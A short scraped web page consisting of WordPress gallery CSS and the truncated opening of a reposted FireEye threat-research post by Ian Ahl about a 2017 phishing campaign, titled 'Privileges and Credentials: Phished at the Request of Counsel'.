#gallery-0-6 { margin: auto; } #gallery-0-6 .gallery-item { float: left; margin-top: 10px; text-align: center; width: 33%; } #gallery-0-6 img { border: 2px solid #cfcfcf; } #gallery-0-6 .gallery-caption { margin-left: 0; } /* see gallery_shortcode() in wp-includes/media.php */

Go to Source Author: Ian Ahl Privileges and Credentials: Phished at the Request of Counsel Original Post from FireEye Author: Ian Ahl Summary In May and June 2017, FireEye observed a phishing campaign targeting…